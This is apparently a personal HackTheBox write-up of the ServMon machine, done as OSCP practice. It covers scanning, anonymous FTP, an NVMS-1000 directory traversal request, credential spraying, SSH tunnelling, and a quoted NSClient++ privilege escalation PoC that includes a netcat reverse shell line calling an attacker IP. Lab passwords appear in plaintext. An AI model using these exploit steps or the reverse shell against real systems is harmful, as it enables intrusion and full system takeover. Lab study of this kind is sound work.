# Port Scanning - Nmap First, I performed a SYN scan against all ports ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ sudo nmap -sS $IP -Pn -n --open --min-rate 3000 -p- [sudo] password for parallels: Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-17 21:17 CDT Nmap scan report for 10.10.10.184 Host is up (0.054s latency). Not shown: 65518 closed tcp ports (reset) PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 5666/tcp open nrpe 6063/tcp open x11 6699/tcp open napster 8443/tcp open https-alt 49664/tcp open unknown 49665/tcp open unknown 49666/tcp open unknown 49667/tcp open unknown 49668/tcp open unknown 49669/tcp open unknown 49670/tcp open unknown ``` Next, I performed a detailed connect scan with `-sC` and `-sV` options on open ports found. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sC -sV $IP -p 21,22,80,135,139,445,5666,6063,6699,8443,49664-49670 Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-17 21:20 CDT Nmap scan report for 10.10.10.184 Host is up (0.054s latency). PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-syst: |_ SYST: Windows_NT | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_02-28-22 07:35PM <DIR> Users 22/tcp open ssh OpenSSH for_Windows_8.0 (protocol 2.0) | ssh-hostkey: | 3072 c7:1a:f6:81:ca:17:78:d0:27:db:cd:46:2a:09:2b:54 (RSA) | 256 3e:63:ef:3b:6e:3e:4a:90:f3:4c:02:e9:40:67:2e:42 (ECDSA) |_ 256 5a:48:c8:cd:39:78:21:29:ef:fb:ae:82:1d:03:ad:af (ED25519) 80/tcp open http |_http-title: Site doesn't have a title (text/html). | fingerprint-strings: | GetRequest, HTTPOptions, RTSPRequest: | HTTP/1.1 200 OK | Content-type: text/html | Content-Length: 340 | Connection: close | AuthInfo: | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> | <html xmlns="http://www.w3.org/1999/xhtml"> | <head> | <title></title> | <script type="text/javascript"> | window.location.href = "Pages/login.htm"; | </script> | </head> | <body> | </body> | </html> | NULL: | HTTP/1.1 408 Request Timeout | Content-type: text/html | Content-Length: 0 | Connection: close |_ AuthInfo: 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 5666/tcp open tcpwrapped 6063/tcp open tcpwrapped 6699/tcp open tcpwrapped 8443/tcp open ssl/https-alt |_ssl-date: TLS randomness does not represent time | fingerprint-strings: | FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: | HTTP/1.1 404 | Content-Length: 18 | Document not found | GetRequest: | HTTP/1.1 302 | Content-Length: 0 | Location: /index.html | iday |_ :Saturday | http-title: NSClient++ |_Requested resource was /index.html | ssl-cert: Subject: commonName=localhost | Not valid before: 2020-01-14T13:24:20 |_Not valid after: 2021-01-13T13:24:20 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49670/tcp open msrpc Microsoft Windows RPC 2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service : ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port80-TCP:V=7.95%I=7%D=6/17%Time=6852225C%P=aarch64-unknown-linux-gnu% SF:r(NULL,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20t SF:ext/html\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x SF:20\r\n\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\ SF:x20text/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthI SF:nfo:\x20\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DT SF:D\x20XHTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xh SF:tml1/DTD/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www SF:\.w3\.org/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\ SF:n\x20\x20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x SF:20\x20\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\ SF:r\n\x20\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html> SF:\r\n")%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20te SF:xt/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\ SF:x20\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20 SF:XHTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/ SF:DTD/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\ SF:.org/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20 SF:\x20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x2 SF:0\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x SF:20\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n" SF:)%r(RTSPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/ht SF:ml\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r SF:\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML SF:\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/x SF:html1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/ SF:1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\ SF:x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20 SF:\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x2 SF:0\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n"); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port8443-TCP:V=7.95%T=SSL%I=7%D=6/17%Time=68522264%P=aarch64-unknown-li SF:nux-gnu%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLo SF:cation:\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0iday\0\0\0\0:Saturda SF:y\0\0\0s\0d\0a\0y\0:\0T\0h\0u\0:\0T\0h\0u\0r\0s\0")%r(HTTPOptions,36,"H SF:TTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20foun SF:d")%r(FourOhFourRequest,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r SF:\n\r\nDocument\x20not\x20found")%r(RTSPRequest,36,"HTTP/1\.1\x20404\r\n SF:Content-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(SIPOptions,36 SF:,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20f SF:ound"); Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2025-06-18T01:22:06 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required |_clock-skew: -1h00m00s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 126.83 seconds ``` And finally last scan against top 1,000 UDP ports. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sU $IP --min-rate 3000 --top-ports 1000 Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-17 21:25 CDT Nmap scan report for 10.10.10.184 Host is up (0.044s latency). Not shown: 999 open|filtered udp ports (no-response) PORT STATE SERVICE 829/udp closed pkix-3-ca-ra Nmap done: 1 IP address (1 host up) scanned in 1.20 seconds ``` # Footprinting ### FTP - Port 21 From the Nmap results, we can see that FTP server allows `Anonymous Login`. Therefore, let's first see what the FTP server might have for us. there a directory named `Users` and inside Users, there were two directories `Nadine` and `Nathan`. There was a file named `Confidential.txt` inside Nadine and `Notes to do.txt` file inside Nathan. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ ftp $IP Connected to 10.10.10.184. 220 Microsoft FTP Service Name (10.10.10.184:parallels): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> ls 229 Entering Extended Passive Mode (|||51633|) 125 Data connection already open; Transfer starting. 02-28-22 07:35PM <DIR> Users <SNIP> 02-28-22 07:36PM <DIR> Nadine 02-28-22 07:37PM <DIR> Nathan <SNIP> 02-28-22 07:36PM 168 Confidential.txt <SNIP> 02-28-22 07:36PM 182 Notes to do.txt ``` ##### Confidential.txt ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ cat Confidential.txt Nathan, I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder. Regards Nadine ``` ##### Notes to do.txt ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ cat Notes\ to\ do.txt 1) Change the password for NVMS - Complete 2) Lock down the NSClient Access - Complete 3) Upload the passwords 4) Remove public access to NVMS 5) Place the secret files in SharePoint ``` ### SMB - PORT 443 I cannot access or list SMB shares without valid credentials ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ smbclient -N -L //$IP/ session setup failed: NT_STATUS_ACCESS_DENIED ``` ### HTTPS - PORT 8443 We need to find the password first. ![[Pasted image 20250617230933.png]] ### HTTP - PORT 80 ![[Pasted image 20250617214359.png]] ##### gobuster gobuster says the server returns 200 status code for non-existing urls. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.184 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== Error: the server returns a status code that matches the provided options for non existing urls. http://10.10.10.184/85317c36-4282-45b5-ba76-4893c3f74f9e => 200 (Length: 118). To continue please exclude the status code or the length ``` And I confirmed it indeed does ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ curl -I http://$IP/wook413 HTTP/1.1 200 OK Content-type: text/xml Content-Length: 118 Connection: close AuthInfo: ``` It appears there's a directory traversal vulnerability to NVMS 1000 ![[Pasted image 20250617223451.png]] `47774.txt` poc tells me I can make a request to the URL path of `/../../../../../../../../../../../../windows/win.ini` and it returns some outputs. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ cat 47774.txt # Title: NVMS-1000 - Directory Traversal # Date: 2019-12-12 # Author: Numan Türle # Vendor Homepage: http://en.tvt.net.cn/ # Version : N/A # Software Link : http://en.tvt.net.cn/products/188.html POC --------- GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1 Host: 12.0.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close Response --------- ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 ``` I followed the poc and it gave me exactly the same output. ![[Pasted image 20250617223903.png]] Nadine wrote a letter to Nathan saying that she left `Passwords.txt` on Nathan's desktop. Let's see if we could get that information. It gave me 7 different lines of passwords. ``` 1nsp3ctTh3Way2Mars! Th3r34r3To0M4nyTrait0r5! B3WithM30r4ga1n5tMe L1k3B1gBut7s@W0rk 0nly7h3y0unGWi11F0l10w IfH3s4b0Utg0t0H1sH0me Gr4etN3w5w17hMySk1Pa5$ ``` ![[Pasted image 20250617224818.png]] I created two files named users and passwords. Let's see if any combination of those 2 files is a valid set of credentials. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ cat users && cat passwords administrator nadine nathan 1nsp3ctTh3Way2Mars! Th3r34r3To0M4nyTrait0r5! B3WithM30r4ga1n5tMe L1k3B1gBut7s@W0rk 0nly7h3y0unGWi11F0l10w IfH3s4b0Utg0t0H1sH0me Gr4etN3w5w17hMySk1Pa5$ ``` We found a valid set of credentials! `nadine:L1k3B1gBut7s@W0rk` ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ crackmapexec smb $IP -u users -p passwords <SNIP> SMB 10.10.10.184 445 SERVMON [*] Windows 10 / Server 2019 Build 17763 x64 (name:SERVMON) (domain:ServMon) (signing:False) (SMBv1:False) SMB 10.10.10.184 445 SERVMON [-] ServMon\administrator:1nsp3ctTh3Way2Mars! STATUS_LOGON_FAILURE SMB 10.10.10.184 445 SERVMON [-] ServMon\administrator:Th3r34r3To0M4nyTrait0r5! STATUS_LOGON_FAILURE SMB 10.10.10.184 445 SERVMON [-] ServMon\administrator:B3WithM30r4ga1n5tMe STATUS_LOGON_FAILURE SMB 10.10.10.184 445 SERVMON [-] ServMon\administrator:L1k3B1gBut7s@W0rk STATUS_LOGON_FAILURE SMB 10.10.10.184 445 SERVMON [-] ServMon\administrator:0nly7h3y0unGWi11F0l10w STATUS_LOGON_FAILURE SMB 10.10.10.184 445 SERVMON [-] ServMon\administrator:IfH3s4b0Utg0t0H1sH0me STATUS_LOGON_FAILURE SMB 10.10.10.184 445 SERVMON [-] ServMon\administrator:Gr4etN3w5w17hMySk1Pa5$ STATUS_LOGON_FAILURE SMB 10.10.10.184 445 SERVMON [-] ServMon\nadine:1nsp3ctTh3Way2Mars! STATUS_LOGON_FAILURE SMB 10.10.10.184 445 SERVMON [-] ServMon\nadine:Th3r34r3To0M4nyTrait0r5! STATUS_LOGON_FAILURE SMB 10.10.10.184 445 SERVMON [-] ServMon\nadine:B3WithM30r4ga1n5tMe STATUS_LOGON_FAILURE SMB 10.10.10.184 445 SERVMON [+] ServMon\nadine:L1k3B1gBut7s@W0rk ``` I was able to log into SSH server with the found credentials ```bash Microsoft Windows [Version 10.0.17763.864] (c) 2018 Microsoft Corporation. All rights reserved. nadine@SERVMON C:\Users\Nadine>whoami servmon\nadine nadine@SERVMON C:\Users\Nadine> ``` Found `user.txt` flag ```bash nadine@SERVMON C:\Users\Nadine\Desktop>dir Volume in drive C has no label. Volume Serial Number is 20C1-47A1 Directory of C:\Users\Nadine\Desktop 06/17/2025 01:14 PM <DIR> . 06/17/2025 01:14 PM <DIR> .. 06/17/2025 01:14 PM 378 evil.bat 06/17/2025 01:14 PM 59,392 nc.exe 06/17/2025 10:37 AM 34 user.txt 06/17/2025 12:01 PM 10,156,032 winPEASany.exe 4 File(s) 10,215,836 bytes 2 Dir(s) 6,246,989,824 bytes free nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt fd97... ``` # Privilege Escalation In the path of `C:\Program Files\NSClient++\nsclient.ini`, I found what appears to be valid password that I could use on port 8443. ```cmd nadine@SERVMON C:\Program Files\NSClient++>type nsclient.ini # If you want to fill this file with all available options run the following command: # nscp settings --generate --add-defaults --load-all # If you want to activate a module and bring in all its options use: # nscp settings --activate-module <MODULE NAME> --add-defaults # For details run: nscp settings --help ; in flight - TODO [/settings/default] ; Undocumented key password = ew2x6SsGTxjRwXOT ; Undocumented key allowed hosts = 127.0.0.1 ``` Or if you click on `Forgotten password?` you will see this pop-up . ![[Pasted image 20250617231242.png]] you get the current password if you enter the command in the pop-up. ```cmd nadine@SERVMON C:\Program Files\NSClient++>nscp web -- password --display Current password: ew2x6SsGTxjRwXOT ``` However, I still cannot login with the password. Why? ![[Pasted image 20250617231655.png]] Back to `nsclient.ini`, it's mentioned the only allowed host is `localhost` ```cmd ; in flight - TODO [/settings/default] ; Undocumented key password = ew2x6SsGTxjRwXOT ; Undocumented key allowed hosts = 127.0.0.1 ``` We're setting up local port forwarding, and here's what the command below does: - My system attempts to connect to the SSH remote server at `$IP` (10.10.10.184) as the user `nadine` - Once the SSH connection is successfully established, any traffic originating from my local system's port 8443 will be securely forwarded through the SSH tunnel to the remote server (10.10.10.184) - The remote server then receives this traffic and routes it to its own `localhost:8443` (meaning, to port 8443 on the remote server itself) ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ ssh nadine@$IP -L 8443:127.0.0.1:8443 [email protected]'s password: ``` Now after setting up the tunnel, I was able to log in with the password found. Notice the IP address in the URL is `127.0.0.1` ![[Pasted image 20250617232802.png]] I found `NSClient++` in searchsploit that's specifically targeting PrivEsc. ![[Pasted image 20250617233859.png]] This is the PoC of the exploit. ``` Exploit Author: bzyo Twitter: @bzyo_ Exploit Title: NSClient++ 0.5.2.35 - Privilege Escalation Date: 05-05-19 Vulnerable Software: NSClient++ 0.5.2.35 Vendor Homepage: http://nsclient.org/ Version: 0.5.2.35 Software Link: http://nsclient.org/download/ Tested on: Windows 10 x64 Details: When NSClient++ is installed with Web Server enabled, local low privilege users have the ability to read the web administator's password in cleartext from the configuration file. From here a user is able to login to the web server and make changes to the configuration file that is normally restricted. The user is able to enable the modules to check external scripts and schedule those scripts to run. There doesn't seem to be restrictions on where the scripts are called from, so the user can create the script anywhere. Since the NSClient++ Service runs as Local System, these scheduled scripts run as that user and the low privilege user can gain privilege escalation. A reboot, as far as I can tell, is required to reload and read the changes to the web config. Prerequisites: To successfully exploit this vulnerability, an attacker must already have local access to a system running NSClient++ with Web Server enabled using a low privileged user account with the ability to reboot the system. Exploit: 1. Grab web administrator password - open c:\program files\nsclient++\nsclient.ini or - run the following that is instructed when you select forget password C:\Program Files\NSClient++>nscp web -- password --display Current password: SoSecret 2. Login and enable following modules including enable at startup and save configuration - CheckExternalScripts - Scheduler 3. Download nc.exe and evil.bat to c:\temp from attacking machine @echo off c:\temp\nc.exe 192.168.0.163 443 -e cmd.exe 4. Setup listener on attacking machine nc -nlvvp 443 5. Add script foobar to call evil.bat and save settings - Settings > External Scripts > Scripts - Add New - foobar command = c:\temp\evil.bat 6. Add schedulede to call script every 1 minute and save settings - Settings > Scheduler > Schedules - Add new - foobar interval = 1m command = foobar 7. Restart the computer and wait for the reverse shell on attacking machine nc -nlvvp 443 listening on [any] 443 ... connect to [192.168.0.163] from (UNKNOWN) [192.168.0.117] 49671 Microsoft Windows [Version 10.0.17134.753] (c) 2018 Microsoft Corporation. All rights reserved. C:\Program Files\NSClient++>whoami whoami nt authority\system Risk: The vulnerability allows local attackers to escalate privileges and execute arbitrary code as Local System ``` I was unable to finish the Privilege Escalation and get the `root.txt` flag. I looked up other people's write ups including the one by popular `0xdf`. People have been voicing about how unstable this box is especially the PE part. Anyways I learned a ton doing this box even up to the PE point. Therefore, I have no complaints. The whole purpose of doing these boxes out of LainKusanagi's list is to learn and study for OSCP, not pwning more HTB boxes.